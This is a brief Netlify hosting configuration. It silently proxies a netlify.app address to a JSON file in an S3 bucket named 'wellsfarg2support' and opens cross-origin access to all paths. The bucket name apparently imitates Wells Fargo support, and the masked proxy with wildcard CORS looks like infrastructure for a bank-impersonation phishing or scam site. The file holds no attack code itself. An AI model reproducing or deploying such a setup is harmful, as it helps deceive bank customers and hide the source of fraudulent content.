[[redirects]]
  from = "https://relaxed-ganache-6bd452.netlify.app"
  to = "https://wellsfarg2support.s3.us-west-2.amazonaws.com/domain.json"
  status = 200
  force = true
  headers = {X-From = "Netlify"}
[[headers]]
  for = "/*"
  [headers.values]
    Access-Control-Allow-Origin = "*"
